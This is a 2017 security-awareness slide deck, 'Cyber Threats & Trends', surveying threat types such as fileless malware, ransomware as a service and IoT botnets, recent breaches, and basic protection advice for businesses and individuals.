April 2017 Agenda Current Threats Recent Events Protecting Your Business and yourself Fileless Malware Resides in RAM not on the hard drive and disappears on reboot Provides remote access and credential harvesting ID: 816265
Download The PPT/PDF document "Cyber Threats & Trends" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.
Slide1
Cyber Threats & Trends
April 2017
Slide2Agenda
Current Threats
Recent Events
Protecting Your Business
…and yourself
Slide3Fileless MalwareResides in RAM (not on the hard drive!) and disappears on reboot. Provides remote access and credential harvesting.
Over 140 enterprises compromised worldwide
Slide4MalvertisingInternet advertisements that install malware.May mislead users to illegitimate or infected domains.Exploit kits deliver malware with user’s knowledge.
5 major malvertising campaigns shut down in last 4 months, potentially reaching millions of users.
Slide5Spear PhishingAttackers use knowledge of an organization to manipulate employees.Uses email or phone calls to pose as someone with authority.Campaigns are in full force for the tax season trying to gather W-2’s and payroll information.
Slide6Ransomware as a ServiceEncrypts your data right under your nose. Pay to unencrypt it or lose it!
Highly developed attack software now sold to attackers. Attackers choose the targets, and developers keep part of the profit.
Profitable and low risk through digital currencies, such as
BitCoin
.
Slide7Ransomware via CompromiseAttackers compromise a system to install malware
Public Remote Desktop Protocol campaign
Attacks started in 2016 and have
beenrising
in early 2017.
Access is often used for other purposes
Slide8DDOS as a ServiceDistributed Denial of Service (DDOS) attacks bring down networks or websites by flooding the target with too traffic to process.Internet of Things (
IoT
) is a growing resource for attackers:
Cameras, DVRs, lightbulbs, and even stuffed animals
Compromised IOT devices helped reach record highs near 700 Gbps, equivalent to the target streaming 140,000 HD movies simultaneously.
You can purchase DDOS attacks for as little as $5!
Slide9THREATS
Slide10Recent Events: IoT DDOS AttackReported Oct. 2016A botnet army consisting of mainly CCTV cameras and DVRs brought down:
Twitter, Amazon, Tumblr, Reddit, Spotify, and Netflix
.
The source code of the attack was then released so any cyber criminal can make their own botnet army.
Slide11Recent Events: E-sports RansomReported Dec. 2016Communicated through E-Sports Entertainment Association (ESEA) bug bounty program but demanded $100,000
Over
1.5 million records leaked
, along with internal infrastructure configuration
Slide12Recent Events: CloudPets BreachReported Jan. 2017IoT
stuffed animal company had an exposed database live for weeks after multiple notification attempts.
2.2 million voice recordings
and
821,396 user accounts
were revealed.
Data was stolen and ransom was attempted 3 times.
Slide13Recent Events: Verifone Internal BreachReported Jan. 2017Corporate network was breached through nearly 2 dozen gas stations.Company forced password reset for all 5300+ employees and contractors.
Slide14Recent Events: McDeliveryReported Feb. 2017McDonald’s
McDelivery
app leaked
2.2 million records
.
Records contained personal profile information.
Slide15Recent Events: Arby’s MalwareReported Feb. 2017Malware discovered on payment systems in corporate stores (“not all” 1000+ stores).
Hundreds of thousands of cards
compromised.
Slide16Recent Events: WordPress Sites DefacedReported Feb. 2017A WordPress platform vulnerability led to
1.5 million web pages
from
40k unique websites
to be compromised.
Unpatched sites are still vulnerable.
Slide17Recent Events: Cisco Zero-Day x 318Reported Mar. 2017Wikileaks Vault 7 files revealed flaw in a Cisco protocol that can grant full control of network devices.
No patch yet – must block vulnerable service on all 318 affected models of hardware.
Slide18Recent Events: Shadow Brokers ReleaseInitially posted August 20165 leaks total, most recent April 2017Contains hacking tools from NSA TAO Some FUD, but
supported
Microsoft products patched
Slide19Overall Trends:
Technology alone is insufficient to deter cyber threats.
Attackers are becoming stealthier and staying for the long haul.
Attackers are hiding their tracks better.
Slide20How Can You Protect Your Business?Ask a few simple questions about risk:
What critical information do you have?
Where is it? Who has access to it?
What would you do in a crisis situation?
Do you know your compliance requirements?
What gaps require insurance?
Slide21How Can You Protect Yourself?Take Personal Responsibility:
Educate your kids on internet safety
Secure your home network, use separate networks for IOTs
Backup your data
Avoid coffee shop
wi-fi
Evaluate the convenience vs. privacy tradeoff
Automate your monitoring wherever possible
Remember NOTHING ever goes away once it’s posted online
Slide22Terry Reece
terry.reece@sera-brynn.com
Questions?